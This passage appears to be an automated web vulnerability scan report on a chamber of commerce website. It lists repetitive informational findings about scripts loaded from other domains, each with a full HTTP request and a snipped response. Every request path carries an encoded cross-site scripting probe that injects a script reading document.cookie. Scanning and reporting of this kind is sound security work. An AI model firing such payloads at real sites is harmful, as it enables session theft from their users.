Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:33 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21333

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js">></script>
<script type="text/javascript" src="http://malsup.github.com/chili-1.7.pack.js"></script>
<script type="text/javascript" src="http://cloud.github.com/downloads/malsup/cycle/jquery.cycle.all.2.72.js"></script>
...[SNIP]...

16.63. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_NGL_off.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_NGL_off.gif

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_NGL_off.gif HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:33 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21326

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js">></script>
<script type="text/javascript" src="http://malsup.github.com/chili-1.7.pack.js"></script>
<script type="text/javascript" src="http://cloud.github.com/downloads/malsup/cycle/jquery.cycle.all.2.72.js"></script>
...[SNIP]...

16.64. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_about_off.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_about_off.gif

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_about_off.gif HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:29 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21328

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js">></script>
<script type="text/javascript" src="http://malsup.github.com/chili-1.7.pack.js"></script>
<script type="text/javascript" src="http://cloud.github.com/downloads/malsup/cycle/jquery.cycle.all.2.72.js"></script>
...[SNIP]...

16.65. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_chamberNews_off.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_chamberNews_off.gif

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_chamberNews_off.gif HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:30 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21334

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js">></script>
<script type="text/javascript" src="http://malsup.github.com/chili-1.7.pack.js"></script>
<script type="text/javascript" src="http://cloud.github.com/downloads/malsup/cycle/jquery.cycle.all.2.72.js"></script>
...[SNIP]...

16.66. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_events_off.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_events_off.gif

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_events_off.gif HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:30 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21329

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js">></script>
<script type="text/javascript" src="http://malsup.github.com/chili-1.7.pack.js"></script>
<script type="text/javascript" src="http://cloud.github.com/downloads/malsup/cycle/jquery.cycle.all.2.72.js"></script>
...[SNIP]...

16.67. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_governmentRelations_off.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_governmentRelations_off.gif

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_governmentRelations_off.gif HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:31 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21342

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js">></script>
<script type="text/javascript" src="http://malsup.github.com/chili-1.7.pack.js"></script>
<script type="text/javascript" src="http://cloud.github.com/downloads/malsup/cycle/jquery.cycle.all.2.72.js"></script>
...[SNIP]...

16.68. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_memberNews_off.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_memberNews_off.gif

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_memberNews_off.gif HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:31 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21333

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js">></script>
<script type="text/javascript" src="http://malsup.github.com/chili-1.7.pack.js"></script>
<script type="text/javascript" src="http://cloud.github.com/downloads/malsup/cycle/jquery.cycle.all.2.72.js"></script>
...[SNIP]...

16.69. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_membership_off.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_membership_off.gif

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_membership_off.gif HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:29 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21333

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js">></script>
<script type="text/javascript" src="http://malsup.github.com/chili-1.7.pack.js"></script>
<script type="text/javascript" src="http://cloud.github.com/downloads/malsup/cycle/jquery.cycle.all.2.72.js"></script>
...[SNIP]...

16.70. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_visitorInfo_off.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_visitorInfo_off.gif

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/mainmenu/mainMenu_visitorInfo_off.gif HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:33 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21334

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js">></script>
<script type="text/javascript" src="http://malsup.github.com/chili-1.7.pack.js"></script>
<script type="text/javascript" src="http://cloud.github.com/downloads/malsup/cycle/jquery.cycle.all.2.72.js"></script>
...[SNIP]...

16.71. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/graphics/design/dc_logo.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/graphics/design/dc_logo.jpg

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/graphics/design/dc_logo.jpg HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:14 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21310

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js">></script>
<script type="text/javascript" src="http://malsup.github.com/chili-1.7.pack.js"></script>
<script type="text/javascript" src="http://cloud.github.com/downloads/malsup/cycle/jquery.cycle.all.2.72.js"></script>
...[SNIP]...

16.72. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/graphics/design/icon_email.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/graphics/design/icon_email.gif

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/graphics/design/icon_email.gif HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:14 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21313

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js">></script>
<script type="text/javascript" src="http://malsup.github.com/chili-1.7.pack.js"></script>
<script type="text/javascript" src="http://cloud.github.com/downloads/malsup/cycle/jquery.cycle.all.2.72.js"></script>
...[SNIP]...

16.73. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/graphics/design/icon_gallery.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/graphics/design/icon_gallery.gif

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/graphics/design/icon_gallery.gif HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:14 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21315

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js">></script>
<script type="text/javascript" src="http://malsup.github.com/chili-1.7.pack.js"></script>
<script type="text/javascript" src="http://cloud.github.com/downloads/malsup/cycle/jquery.cycle.all.2.72.js"></script>
...[SNIP]...

16.74. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/graphics/design/icon_home.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/graphics/design/icon_home.gif

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/graphics/design/icon_home.gif HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:13 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21312

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js">></script>
<script type="text/javascript" src="http://malsup.github.com/chili-1.7.pack.js"></script>
<script type="text/javascript" src="http://cloud.github.com/downloads/malsup/cycle/jquery.cycle.all.2.72.js"></script>
...[SNIP]...

16.75. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/graphics/design/search_button.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/graphics/design/search_button.jpg

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/graphics/design/search_button.jpg HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:14 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21316

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js">></script>
<script type="text/javascript" src="http://malsup.github.com/chili-1.7.pack.js"></script>
<script type="text/javascript" src="http://cloud.github.com/downloads/malsup/cycle/jquery.cycle.all.2.72.js"></script>
...[SNIP]...

16.76. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/graphics/footer_email_icon.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/graphics/footer_email_icon.gif

Issue detail

The response dynamically includes the following scripts from other domains:

Request

